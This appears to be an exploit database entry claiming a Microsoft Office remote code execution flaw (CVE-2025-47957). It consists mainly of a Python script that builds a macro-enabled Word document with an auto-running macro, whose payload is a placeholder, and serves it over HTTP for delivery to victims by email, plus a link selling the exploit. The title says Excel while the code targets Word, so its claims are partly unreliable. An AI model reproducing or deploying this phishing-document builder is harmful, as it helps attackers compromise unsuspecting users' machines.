
4 changes to exploits/shellcodes/ghdb FortiOS SSL-VPN 7.4.4 - Insufficient Session Expiration & Cookie Reuse Ingress-NGINX 4.11.0 - Remote Code Execution (RCE) Microsoft Excel LTSC 2024 - Remote Code Execution (RCE)
151 lines
No EOL
4.4 KiB
Python
Executable file
151 lines
No EOL
4.4 KiB
Python
Executable file
# Titles: Microsoft Excel LTSC 2024 - Remote Code Execution (RCE)
|
|
# Author: nu11secur1ty
|
|
# Date: 06/16/2025
|
|
# Vendor: Microsoft
|
|
# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
|
|
# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27751
|
|
# CVE-2025-47957
|
|
# Versions: Microsoft Office LTSC 2024 , Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise
|
|
|
|
## Description:
|
|
The attacker can trick any user into opening and executing their code by
|
|
sending a malicious DOCX file via email or a streaming server. After the
|
|
execution of the victim, his machine can be infected or even worse than
|
|
ever; this could be the end of his Windows machine! WARNING: AMPOTATE THE
|
|
MACROS OPTIONS FROM YOUR OFFICE 365!!!
|
|
|
|
STATUS: HIGH-CRITICAL Vulnerability
|
|
|
|
|
|
[+]Exploit:
|
|
|
|
```
|
|
#!/usr/bin/python
|
|
# CVE-2025-47957 by nu11secur1ty
|
|
import os
|
|
import time
|
|
import zipfile
|
|
import threading
|
|
import http.server
|
|
import socket
|
|
import socketserver
|
|
import win32com.client
|
|
|
|
def get_local_ip():
|
|
"""Get the LAN IP address of the current machine."""
|
|
try:
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
|
s.connect(("8.8.8.8", 80)) # External DNS, just for routing
|
|
ip = s.getsockname()[0]
|
|
s.close()
|
|
return ip
|
|
except:
|
|
return "127.0.0.1"
|
|
|
|
def create_docm_with_auto_macro(filename):
|
|
script_dir = os.path.dirname(os.path.abspath(__file__))
|
|
full_path = os.path.join(script_dir, filename)
|
|
|
|
word = win32com.client.Dispatch("Word.Application")
|
|
word.Visible = False
|
|
doc = word.Documents.Add()
|
|
|
|
doc.Content.Text = "This document contains an auto-starting macro."
|
|
|
|
vbproject = doc.VBProject
|
|
vbcomponent = vbproject.VBComponents.Add(1) # Standard Module
|
|
|
|
macro_code = '''
|
|
Sub AutoOpen()
|
|
Call YOUR_PoC
|
|
End Sub
|
|
|
|
Sub YOUR_PoC()
|
|
Dim Program As String
|
|
Dim TaskID As Double
|
|
On Error Resume Next
|
|
Program = "YOUR_EXPLOIT_HERE"
|
|
TaskID = YOUR_TASK_HERE
|
|
If Err <> 0 Then
|
|
MsgBox "Can't start " & Program
|
|
End If
|
|
End Sub
|
|
'''
|
|
vbcomponent.CodeModule.AddFromString(macro_code)
|
|
|
|
wdFormatXMLDocumentMacroEnabled = 13
|
|
doc.SaveAs(full_path, FileFormat=wdFormatXMLDocumentMacroEnabled)
|
|
doc.Close()
|
|
word.Quit()
|
|
|
|
print(f"[+] Macro-enabled .docm saved at: {full_path}")
|
|
return full_path
|
|
|
|
def compress_to_zip(filepath):
|
|
zip_path = filepath + '.zip'
|
|
with zipfile.ZipFile(zip_path, 'w') as zipf:
|
|
zipf.write(filepath, arcname=os.path.basename(filepath))
|
|
print(f"[+] Compressed to ZIP: {zip_path}")
|
|
return zip_path
|
|
|
|
def start_http_server(directory, port=8000):
|
|
os.chdir(directory)
|
|
handler = http.server.SimpleHTTPRequestHandler
|
|
httpd = socketserver.TCPServer(("", port), handler)
|
|
ip = get_local_ip()
|
|
print(f"[+] HTTP server running at: http://{ip}:{port}/")
|
|
|
|
thread = threading.Thread(target=httpd.serve_forever)
|
|
thread.daemon = True
|
|
thread.start()
|
|
return httpd
|
|
|
|
if __name__ == "__main__":
|
|
filename = "CVE-2025-47957.docm"
|
|
docm_path = create_docm_with_auto_macro(filename)
|
|
zip_path = compress_to_zip(docm_path)
|
|
server = start_http_server(os.path.dirname(docm_path))
|
|
|
|
try:
|
|
print("[*] Server running — press Ctrl+C to stop...")
|
|
while True:
|
|
time.sleep(1)
|
|
except KeyboardInterrupt:
|
|
print("\n[!] Ctrl+C detected — shutting down server...")
|
|
server.shutdown()
|
|
print("[+] The Exploit Server stopped. Goodbye!")
|
|
|
|
```
|
|
|
|
# Reproduce:
|
|
[href](https://www.youtube.com/watch?v=r4NsGrO56yo)
|
|
|
|
# Buy an exploit only:
|
|
[href](https://satoshidisk.com/pay/COeJqt)
|
|
|
|
# Time spent:
|
|
01:37:00
|
|
|
|
|
|
--
|
|
System Administrator - Infrastructure Engineer
|
|
Penetration Testing Engineer
|
|
Exploit developer at https://packetstormsecurity.com/
|
|
https://cve.mitre.org/index.html
|
|
https://cxsecurity.com/ and https://www.exploit-db.com/
|
|
0day Exploit DataBase https://0day.today/
|
|
home page: https://www.nu11secur1ty.com/
|
|
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
|
nu11secur1ty <http://nu11secur1ty.com/>
|
|
|
|
--
|
|
|
|
System Administrator - Infrastructure Engineer
|
|
Penetration Testing Engineer
|
|
Exploit developer at https://packetstorm.news/
|
|
https://cve.mitre.org/index.html
|
|
https://cxsecurity.com/ and https://www.exploit-db.com/
|
|
0day Exploit DataBase https://0day.today/
|
|
home page: https://www.nu11secur1ty.com/
|
|
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
|
nu11secur1ty <http://nu11secur1ty.com/> |